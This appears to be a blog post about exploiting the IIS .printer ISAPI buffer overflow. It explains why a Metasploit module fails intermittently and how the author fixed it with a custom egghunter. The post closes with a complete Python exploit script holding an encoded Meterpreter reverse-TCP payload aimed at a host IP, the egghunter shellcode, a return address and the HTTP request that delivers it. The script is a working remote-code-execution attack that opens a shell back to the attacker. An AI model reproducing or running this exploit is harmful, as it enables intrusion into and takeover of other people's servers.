After breaking out immunity debugger it became clear as to why the exploit did not work everytime. According to the metasploit module the shellcode was being held at an offset of EBX and with a short assembly stub we jump to that location (see metasploit snippet below)
buf = make_nops(280)buf[268, 4] = [target.ret].pack('V')# payload is at: [ebx + 96] + 256 + 64buf << "\x8b\x4b\x60" # mov ecx, [ebx + 96]buf << "\x80\xc1\x40" # add cl, 64buf << "\x80\xc5\x01" # add ch, 1buf << "\xff\xe1" # jmp ecxsock.put("GET http://#{buf}/NULL.printer?#{payload.encoded} HTTP/1.0\r\n\r\n")
While this does work, it appears that sometimes the payload is not within the window and the exploit is not successful. Since we know about where in memory our payload will be when we gain control of EIP seems like a good place to use an egghunter :) I started out with an existing egghunter (http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf) and modified it a little since I know about where in memory my payload is there was no sense looking everywhere for it :) A warning ahead of time - I was lazy and nop'd out the access violation check...I had plenty of bytes to burn ;) -
mov edx, ebx #ebx is the area of our starting pointor dx, 0fffxor dx,0fff #clear out the bottom half of edx for the start of our loopinc edx #increment edx - this is the start of our loopnop #abbreviated nops where the original access violation check was......mov eax, 57303054 #load our egg "W00T"mov edi, edx #set edi to point at our current location in memoryscas dword ptr es:[edi] #compare our egg to dword at edijnz #jump back to the start of our loop (inc edx) if we didnt find the eggscas dword ptr es:[edi] #compare our egg to the next dword for the 2nd part of the eggjnz #jump back to the start of our loop (inc edx) if we didnt find the 2nd eggjmp edi #jump to edi as it points to the first byte after our egg
After implementing the egghunter into the exploit I had no issues getting a shell everytime :)
Full exploit below - obviously will have to change the shellcode for it to work for you -
import urllib2
import sys
shell= "T00WT00W"
shell +="\x90"*(10)
########################################################################################################
# msfpayload windows/meterpreter/reverse_tcp lhost=192.168.170.1 R|msfencode -e x86/alpha_upper -t c #
########################################################################################################
shell += ("\x89\xe1\xd9\xe8\xd9\x71\xf4\x5a\x4a\x4a\x4a\x4a\x4a\x43\x43"
"\x43\x43\x43\x43\x52\x59\x56\x54\x58\x33\x30\x56\x58\x34\x41"
"\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42"
"\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50"
"\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x4b\x39\x43\x30\x45"
"\x50\x45\x50\x45\x30\x4d\x59\x4a\x45\x50\x31\x4e\x32\x45\x34"
"\x4c\x4b\x46\x32\x50\x30\x4c\x4b\x51\x42\x44\x4c\x4c\x4b\x51"
"\x42\x44\x54\x4c\x4b\x43\x42\x46\x48\x44\x4f\x4f\x47\x50\x4a"
"\x46\x46\x46\x51\x4b\x4f\x46\x51\x49\x50\x4e\x4c\x47\x4c\x43"
"\x51\x43\x4c\x44\x42\x46\x4c\x51\x30\x49\x51\x48\x4f\x44\x4d"
"\x43\x31\x49\x57\x4b\x52\x4a\x50\x46\x32\x51\x47\x4c\x4b\x50"
"\x52\x42\x30\x4c\x4b\x47\x32\x47\x4c\x45\x51\x48\x50\x4c\x4b"
"\x47\x30\x42\x58\x4b\x35\x4f\x30\x42\x54\x51\x5a\x43\x31\x4e"
"\x30\x50\x50\x4c\x4b\x47\x38\x42\x38\x4c\x4b\x46\x38\x51\x30"
"\x45\x51\x49\x43\x4d\x33\x47\x4c\x50\x49\x4c\x4b\x47\x44\x4c"
"\x4b\x43\x31\x4e\x36\x50\x31\x4b\x4f\x46\x51\x49\x50\x4e\x4c"
"\x49\x51\x48\x4f\x44\x4d\x45\x51\x48\x47\x47\x48\x4d\x30\x42"
"\x55\x4b\x44\x44\x43\x43\x4d\x4b\x48\x47\x4b\x43\x4d\x46\x44"
"\x44\x35\x4a\x42\x50\x58\x4c\x4b\x50\x58\x46\x44\x45\x51\x49"
"\x43\x42\x46\x4c\x4b\x44\x4c\x50\x4b\x4c\x4b\x51\x48\x45\x4c"
"\x43\x31\x49\x43\x4c\x4b\x45\x54\x4c\x4b\x43\x31\x48\x50\x4d"
"\x59\x51\x54\x47\x54\x47\x54\x51\x4b\x51\x4b\x43\x51\x46\x39"
"\x51\x4a\x46\x31\x4b\x4f\x4d\x30\x50\x58\x51\x4f\x51\x4a\x4c"
"\x4b\x42\x32\x4a\x4b\x4b\x36\x51\x4d\x42\x48\x46\x53\x46\x52"
"\x43\x30\x43\x30\x43\x58\x42\x57\x42\x53\x47\x42\x51\x4f\x50"
"\x54\x43\x58\x50\x4c\x43\x47\x46\x46\x43\x37\x4b\x4f\x49\x45"
"\x48\x38\x4a\x30\x45\x51\x45\x50\x45\x50\x46\x49\x49\x54\x50"
"\x54\x50\x50\x45\x38\x46\x49\x4b\x30\x42\x4b\x45\x50\x4b\x4f"
"\x48\x55\x46\x30\x50\x50\x46\x30\x46\x30\x47\x30\x46\x30\x51"
"\x50\x46\x30\x42\x48\x4b\x5a\x44\x4f\x49\x4f\x4d\x30\x4b\x4f"
"\x49\x45\x4a\x37\x42\x4a\x43\x35\x45\x38\x4f\x30\x49\x38\x4f"
"\x5a\x43\x31\x45\x38\x44\x42\x43\x30\x42\x31\x51\x4c\x4c\x49"
"\x4a\x46\x43\x5a\x42\x30\x50\x56\x51\x47\x43\x58\x4a\x39\x49"
"\x35\x43\x44\x43\x51\x4b\x4f\x48\x55\x4d\x55\x4f\x30\x43\x44"
"\x44\x4c\x4b\x4f\x50\x4e\x43\x38\x44\x35\x4a\x4c\x45\x38\x4a"
"\x50\x48\x35\x4f\x52\x50\x56\x4b\x4f\x48\x55\x43\x5a\x43\x30"
"\x43\x5a\x44\x44\x46\x36\x51\x47\x42\x48\x45\x52\x4e\x39\x4f"
"\x38\x51\x4f\x4b\x4f\x48\x55\x4c\x4b\x47\x46\x43\x5a\x51\x50"
"\x42\x48\x45\x50\x42\x30\x43\x30\x43\x30\x50\x56\x42\x4a\x45"
"\x50\x45\x38\x50\x58\x4e\x44\x46\x33\x4b\x55\x4b\x4f\x49\x45"
"\x4a\x33\x46\x33\x43\x5a\x43\x30\x50\x56\x51\x43\x50\x57\x42"
"\x48\x44\x42\x48\x59\x4f\x38\x51\x4f\x4b\x4f\x4e\x35\x45\x51"
"\x49\x53\x51\x39\x49\x56\x4d\x55\x4c\x36\x43\x45\x4a\x4c\x4f"
"\x33\x44\x4a\x41\x41")
egghunter="\x8B\xD3\x66\x81\xCA\xFF\x0F\x66\x81\xF2\xFF\x0F\x42\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\xB8\x54\x30\x30\x57\x8B\xFA\xAF\x75\xEA\xAF\x75\xE7\xFF\xE7"
buff = 'A'*268 + '\x4d\x3f\xe3\x77' +"\x90"*5 + egghunter + '\x90'*156
useragent = 'Shit Bird'
header = {'User-Agent':useragent, 'Host':buff}
req = urllib2.Request('http://'+sys.argv[1]+'/NULL.printer?'+shell,headers = header)
res = urllib2.urlopen(req)
res.close()
No comments:
Post a Comment
Note: Only a member of this blog may post a comment.